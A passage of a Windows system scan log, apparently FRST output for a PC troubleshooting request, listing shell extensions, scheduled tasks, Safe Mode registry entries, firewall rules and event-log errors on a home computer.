TuneUp\DseShExt-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers4: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-03-13] (Intel Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> No File ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0E9B0B5C-9FF3-4A29-8479-0868A68DD87B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe Task: {191F9E6F-750B-463B-8275-674A085E6A42} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] () Task: {21D98608-212B-477C-9E51-862F8F865EFA} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe Task: {22791815-78FB-4088-8BBB-3DA7D50664F8} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe [2017-10-20] (AVG Technologies CZ, s.r.o.) Task: {2956E29D-A64D-413D-B892-F5AA2AC347BB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {2A74738F-77EA-45BE-807D-0DA7AE3821FF} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-06] (Piriform Ltd) Task: {377D44F2-DA65-41BB-88CF-6FFF1FAB3C41} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-09-05] (Oracle Corporation) Task: {3999671B-80BF-4CDF-A95C-93FD2F0FE480} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {3B2D8390-8289-4929-BA17-F6A1C85B47FB} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK Task: {3CBC40D7-5079-4162-B3CF-8BB086B1F88F} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {3E03F475-3149-4094-9896-BA78F8B2E6BC} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated) Task: {40897B9F-93AB-425D-93AC-B8BA97E5EF17} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {42B3B434-E3AE-470E-99AF-7D12327B8919} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated) Task: {43C39166-DBC4-4D93-BE8B-15FFD6AB03C8} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe Task: {46EB3B5F-0B59-4CAC-A06A-88742BCC1E3C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation) Task: {49072A42-1C33-4821-800D-28DD295D6786} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4D2B3324-B32F-4DB4-B0C1-1503C3219780} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [2017-03-28] () Task: {4FF356D2-FE47-4920-B00B-3E8B260DCA26} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {528B6446-B6F7-44E3-AA71-6203798B4E57} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {53C82D5D-CAA2-4928-AD01-FD5CA9402E42} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {54C24529-FE0D-45F3-921C-72B199731A29} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {595084B0-8061-4646-9643-A34F03C12F44} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {63882D74-4B0D-4654-86EE-D96AE3948093} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {6563DB5C-54FD-4007-98A3-1F779956369C} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {6A73D90C-B17C-4761-8357-1A346F1A3327} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {6E4E297E-904A-4E8C-A1D8-E7015D9472FF} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation) Task: {6FE732AA-0ED1-40DA-92A4-F64A10E68D10} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] () Task: {74B79B52-5FD9-4C14-BAB0-205B4C4DD9F9} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe Task: {818B6E4F-B131-4DE5-AA3E-03329037D6B4} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation) Task: {82B3BF49-D8E5-44A0-99BB-744A644CF9B3} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2017-07-26] (AVG Technologies CZ, s.r.o.) Task: {92BE7943-78D8-4C4B-883D-3B2AAF434323} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {A07E9AD8-DFAC-47D9-AB07-04E3E9CA4C84} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation) Task: {A1231E6E-3113-41DF-B107-2905830BF645} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-10-11] (Microsoft Corporation) Task: {A1D60D55-A6B8-401B-BC05-2938E02DF2F2} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => d:\program files\windows defender\MpCmdRun.exe Task: {A32272C9-4C2E-40B3-9BC4-7837AAA94F46} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe Task: {B1450FE1-82E8-40F1-8F3F-5749E0F9E20E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {B339B57F-52A4-44A2-B3C0-AFE7668D7751} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe Task: {B75CC161-8539-4321-B7B7-BDBBDC184FCC} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-05-29] () Task: {BA7F3875-7416-4EF5-B045-A03824D3AFA2} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {C11D840D-C170-4F9B-8C68-0CFA8D3BFBF9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-10-25] (Adobe Systems Incorporated) Task: {C1913C94-0842-490C-B755-F95332E09ABA} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {C4E8B14A-4159-4C58-BDAD-281DBBFC97E8} - System32\Tasks\Microsoft\Windows Defender\MpIdleTask => d:\program files\windows defender\MpCmdRun.exe Task: {CE4EEC05-AE50-4266-B124-7496745958B2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {D163B177-E9E5-43D7-B1DE-32EEFF81AA9A} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-04-22] (Dell Inc.) Task: {DA5EBFDD-F0C4-44BB-802B-EC827B4A9BF5} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {DA9D1E83-01AA-4187-BDB9-6D13247DE477} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {DD892FCB-068E-4A07-AFA4-C8584CF611D9} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {FFD0BCF8-7926-4344-A2B0-908C275D350D} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Caret.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=fljalecfjciodhpcledpamjachpmelml ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Murder Files.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=ijfecbiladpinddbjfodaaiahggomhaf ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Pixlr Touch Up.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=jklljiahjgoglchglekebfljnmbaleig ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Solitaire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=lkbhppfbabandkdmgjmifahoabeodiep ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sunrise Calendar.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=mojepfklcankkmikonjlnidiooanmpbb ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\WorkFlowy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=koegeopamaoljbmhnfjbclbocehhgmkm ==================== Loaded Modules (Whitelisted) ============== 2016-03-15 10:19 - 2017-11-10 06:37 - 008931496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll 2017-03-18 15:58 - 2017-03-18 15:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-03-18 15:59 - 2017-03-18 21:30 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "DisplayName"="Dell" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ErrorControl"="1" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ImagePath"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ObjectName"="LocalSystem" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Start"="2" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Type"="272" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "Application"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "AppParameters"="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\localhost -> localhost ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2015-08-13 13:46 - 000000734 ____N C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\Pictures\lighthouse.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\Services: RapportMgmtService => 2 MSCONFIG\Services: RtkAudioService => 2 MSCONFIG\Services: SftService => 2 MSCONFIG\Services: TuneUp.UtilitiesSvc => 2 HKLM\...\StartupApproved\StartupFolder: => "Install LastPass FF RunOnce.lnk" HKLM\...\StartupApproved\StartupFolder: => "Install LastPass IE RunOnce.lnk" HKLM\...\StartupApproved\Run: => "SecurityHealth" HKLM\...\StartupApproved\Run32: => "CanonQuickMenu" HKLM\...\StartupApproved\Run32: => "CanonSolutionMenuEx" HKLM\...\StartupApproved\Run32: => "DBAgent" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKLM\...\StartupApproved\Run32: => "USB3MON" HKLM\...\StartupApproved\Run32: => "vProt" HKLM\...\StartupApproved\Run32: => "Malwarebytes Anti-Exploit" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "CCleaner Monitoring" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "GarminExpressTrayApp" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "Uploader" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{7CF0B69C-0DF4-4E8D-A6D0-6DF63D0B1078}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{9497CDF5-9603-4872-82A5-93316B585EE7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{D4EE236B-05CC-4705-ADEE-70E743A19AC5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{05FDCBFA-215A-4D4B-A73E-2AB2A29459BB}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{4D14B9BE-7542-4749-B117-E76E3718F94B}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{DD007F03-6CFB-4FF3-855D-77C1CAA586E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{17259786-812F-437A-95AA-4348016A08BD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{A6A28A3D-5FEE-4082-BB98-15AC1C5B7D7D}] => (Allow) C:\Program Files (x86)\Laplink\PCmover\pcmover.exe FirewallRules: [{AC7706D0-A3B5-47C1-B042-A8187C6E147A}] => (Allow) LPort=8888 FirewallRules: [{863F6857-0276-49C5-B1E5-CFC6C75E1D42}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe FirewallRules: [{E1E8C3C4-1603-491E-9EE6-5D72E01B5238}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{52D8F604-C3D5-47E7-B367-10F9C7371B49}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{D226D9A4-6BA1-44B6-A9D6-D4BDE65858D9}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{1548C2C5-D5F3-42F1-9CD0-CCB29B1F8A25}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{A20652DE-EB50-4341-9C75-4F87A50AB71B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{C27B36A2-3295-4928-B9AF-8A70F1B245E5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{CB2E633C-B6CF-41FD-A0ED-2097BCC10CF8}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{97104FE1-B253-4B66-94B8-34C61639F706}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{4C7BD61A-FC97-4D74-BCE1-B3A03553E670}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{28D86D11-A19B-4C4C-8C72-E8D90A3AEF4F}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe ==================== Restore Points ========================= 05-11-2017 16:29:34 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/13/2017 09:07:06 AM) (Source: COM) (EventID: 10031) (User: ) Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected Error: (11/13/2017 06:28:15 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_lfsvc, version: 10.0.15063.0, time stamp: 0x02799ef5 Faulting module name: LocationFramework.dll, version: 10.0.15063.608, time stamp: 0xb3f3038c Exception code: 0xe0464645 Fault offset: 0x00000000000aae2f Faulting process id: 0x1968 Faulting application start time: 0x01d35c2a7b04d223 Faulting application path: c:\windows\system32\svchost.exe Faulting module path: c:\windows\system32\LocationFramework.dll Report Id: 0759c73d-d665-409c-8b6a-267a2a1e8b63 Faulting package full name: Faulting package-relative application ID: Error: (11/13/2017 06:27:56 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_lfsvc, version: 10.0.15063.0, time stamp: 0x02799ef5 Faulting module name: LocationFramework.dll, version: 10.0.15063.608, time stamp: 0xb3f3038c Exception code: 0xe0464645 Fault offset: 0x00000000000b2c0b Faulting process id: 0x1968 Faulting application start time: 0x01d35c2a7b04d223 Faulting application path: c:\windows\system32\svchost.exe Faulting module path: c:\windows\system32\LocationFramework.dll Report Id: 73f478de-eff5-4f4e-8e96-aba5e7f1089f Faulting package full name: Faulting package-relative application ID: Error: (11/13/2017 06:25:03 AM) (Source: SideBySide) (EventID: 35) (User: ) Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1. Component identity found in manifest does not match the identity of the component requested. Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0". Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0". Please use sxstrace.exe for detailed diagnosis. Error: (11/13/2017 06:24:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: esu.exe, version: 1.0.0.0, time stamp: 0x58dac8d5 Faulting module name: KERNELBASE.dll, version: 10.0.15063.674, time stamp: 0x6d16dd24 Exception code: 0xe0434352 Fault offset: 0x000eb872 Faulting process id: 0x2188 Faulting application start time: 0x01d35c72029861ee Faulting application path: C:\Program Files (x86)\Garmin\Express SelfUpdater\esu.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: 96c0caee-0448-46ff-97eb-c8148453f7a2 Faulting package full name: Faulting package-relative application ID: Error: (11/13/2017 06:24:48 AM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application: esu.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: System.IO.FileNotFoundException at Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61.MoveNext() at System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start[[Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61, ExpressSelfUpdater, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null]](<UpdateDatacenterOverridesAsync>d__61 ByRef) at Garmin.Omt.Service.Shared.Overrides.UpdateDatacenterOverridesAsync(Boolean) at Garmin.Omt.Service.Shared.Overrides..cctor() Exception Info: System.TypeInitializationException at Garmin.Omt.Service.Shared.Overrides.get_OmtBaseUrl() at Garmin.Omt.Express.SelfUpdater.Program.RealMain() at Garmin.Omt.Express.SelfUpdater.Program.Main(System.String[]) Error: (11/13/2017 06:23:04 AM) (Source: SideBySide) (EventID: 35) (User: ) Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1. Component identity found in manifest does not match the identity of the component requested. Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0". Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0". Please use sxstrace.exe for detailed diagnosis. Error: (11/13/2017 06:21:54 AM) (Source: COM) (EventID: 10031) (User: ) Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected Error: (11/12/2017 11:23:06 PM) (Source: COM) (EventID: 10031) (User: ) Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected Error: (11/12/2017 11:23:06 PM) (Source: COM) (EventID: 10031) (User: ) Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected System errors: ============= Error: (11/13/2017 09:29:33 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY) Description: DCOM got error "1084" attempting to start the service EventSystem with arguments "Unavailable" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF} Error: (11/13/2017 09:29:27 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (11/13/2017 09:28:49 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/13/2017 09:28:49 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/13/2017 09:28:47 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/13/2017 09:28:47 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/13/2017 09:28:47 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (11/13/2017 09:28:19 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/13/2017 09:28:19 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/13/2017 09:28:19 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service ShellHWDetection with 